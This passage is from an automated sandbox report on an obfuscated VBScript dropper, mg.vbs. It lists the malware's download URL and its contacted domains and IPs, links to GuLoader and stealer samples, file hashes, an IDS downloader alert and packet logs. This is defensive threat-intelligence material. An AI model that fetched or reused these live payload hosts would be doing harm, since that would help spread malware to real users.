                http://almrwad.compowershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.erp-royal-crown.infopowershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://erp-royal-crown.infopowershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.erp-royal-crown.infopowershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC5EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://contoso.com/powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.almrwad.compowershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.erp-royal-crown.info/wh/Subordinerendes78.smiXpowershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              		unknown
                              http://www.almrwad.compowershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  148.251.114.233
                                  		erp-royal-crown.infoGermany
                                  		24940HETZNER-ASDEfalse
                                  184.171.244.231
                                  		almrwad.comUnited States
                                  		33182DIMENOCUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1569002
                                  Start date and time:2024-12-05 10:40:48 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 47s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:mg.vbs
                                  Detection:MAL
                                  Classification:mal100.expl.evad.winVBS@6/3@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 4
                                  • Number of non-executed functions: 1
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7016 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: mg.vbs

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:41:43API Interceptor3727444x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/fchs/
                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                  • www.eslameldaramlly.site/30vc/
                                  184.171.244.231mj.ps1Get hashmaliciousUnknownBrowse
                                    ap.ps1Get hashmaliciousUnknownBrowse
                                      cu.ps1Get hashmaliciousUnknownBrowse
                                        Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                          ni.ps1Get hashmaliciousUnknownBrowse
                                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                              yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  DIMENOCUSmj.ps1Get hashmaliciousUnknownBrowse
                                                  • 184.171.244.231
                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                  • 184.171.244.231
                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                  • 184.171.244.231
                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                  • 184.171.244.231
                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                  • 184.171.244.231
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, VidarBrowse
                                                  • 67.23.237.28
                                                  file.exeGet hashmaliciousAmadeyBrowse
                                                  • 67.23.237.28
                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 8.33.162.220
                                                  Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousHTMLPhisherBrowse
                                                  • 177.234.150.226
                                                  3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                  • 177.234.150.226
                                                  HETZNER-ASDEmj.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 88.99.61.52
                                                  https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                  • 5.9.227.67
                                                  Ttok18.exeGet hashmaliciousVidarBrowse
                                                  • 159.69.102.165
                                                  jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                  • 159.69.102.165
                                                  file.exeGet hashmaliciousVidarBrowse
                                                  • 159.69.102.165

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0emj.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  ap.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  cu.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  Scripts_Obfusque.vbsGet hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  ni.ps1Get hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231
                                                  Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                  • 148.251.114.233
                                                  • 184.171.244.231

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itqt2h1y.fvq.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj1qlplk.h1d.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  Static File Info

                                                  General

                                                  File type:ASCII text, with very long lines (316), with CRLF line terminators
                                                  Entropy (8bit):5.16757071229696
                                                  TrID:
                                                  • Visual Basic Script (13500/0) 100.00%
                                                  File name:mg.vbs
                                                  File size:29'287 bytes
                                                  MD5:8df76af54c38d5d4c2cd9f6d18eedf92
                                                  SHA1:b21c95ebf34440ad8da30f6e4fe25badb871d61a
                                                  SHA256:2fd9440e21adf91473719e9fb085f4d47a1d5afcf02333a7f04d2a0f4d0b1c77
                                                  SHA512:8dbbdbc575a292890f1b1bb8aeda916a958225b11739075b447ae7ce64774c678c45b071f0fbb91460bb218409e026ecfcf05740dad8eb059b773c990d57fb09
                                                  SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                  TLSH:D9D219D3CAC625188A9509B7DD130BB34DA1456E77131F38A3BCCA5D908395CA2BFBC8
                                                  File Content Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirer

                                                  File Icon

                                                  Icon Hash:68d69b8f86ab9a86

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-05T10:41:52.827105+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449731184.171.244.231443TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 5, 2024 10:41:44.977871895 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:44.977926970 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:44.978003025 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:44.985450983 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:44.985493898 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.447745085 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.447879076 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:46.471873999 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:46.471916914 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.472311020 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.517453909 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:46.554768085 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:46.595338106 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.899909019 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.899982929 CET44349730184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:46.900057077 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:46.909812927 CET49730443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:51.097549915 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:51.097599983 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:51.098066092 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:51.098066092 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:51.098114967 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:52.366038084 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:52.372734070 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:52.372761011 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:52.827157974 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:52.827238083 CET44349731184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:41:52.827594995 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:52.829233885 CET49731443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:41:56.992300987 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:56.992347002 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:56.992420912 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:56.992708921 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:56.992722988 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.398422003 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.398533106 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:58.403318882 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:58.403347015 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.403856993 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.404722929 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:58.451330900 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.938786983 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.938999891 CET44349732148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:41:58.939099073 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:41:58.942013025 CET49732443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:02.973949909 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:02.973998070 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:02.974066019 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:02.974354029 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:02.974365950 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:04.232676983 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:04.240756989 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:04.240775108 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:04.694104910 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:04.694173098 CET44349737184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:04.694413900 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:04.694698095 CET49737443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:08.692470074 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:08.692512989 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:08.692646980 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:08.692850113 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:08.692862034 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:10.092026949 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:10.107359886 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:10.107392073 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:10.639652014 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:10.639830112 CET44349740148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:10.639872074 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:10.640137911 CET49740443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:14.648020029 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:14.648062944 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:14.648156881 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:14.648382902 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:14.648396015 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:15.912837029 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:15.914098978 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:15.914112091 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:16.371901035 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:16.371979952 CET44349741184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:16.372025967 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:16.372498035 CET49741443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:20.380245924 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:20.380299091 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:20.380378008 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:20.380609035 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:20.380618095 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:21.781630039 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:21.782968998 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:21.782987118 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:22.378473043 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:22.378648996 CET44349742148.251.114.233192.168.2.4
                                                  Dec 5, 2024 10:42:22.378693104 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:22.378956079 CET49742443192.168.2.4148.251.114.233
                                                  Dec 5, 2024 10:42:26.379919052 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:26.379964113 CET44349743184.171.244.231192.168.2.4
                                                  Dec 5, 2024 10:42:26.380038023 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:26.380312920 CET49743443192.168.2.4184.171.244.231
                                                  Dec 5, 2024 10:42:26.380323887 CET44349743184.171.244.231192.168.2.4
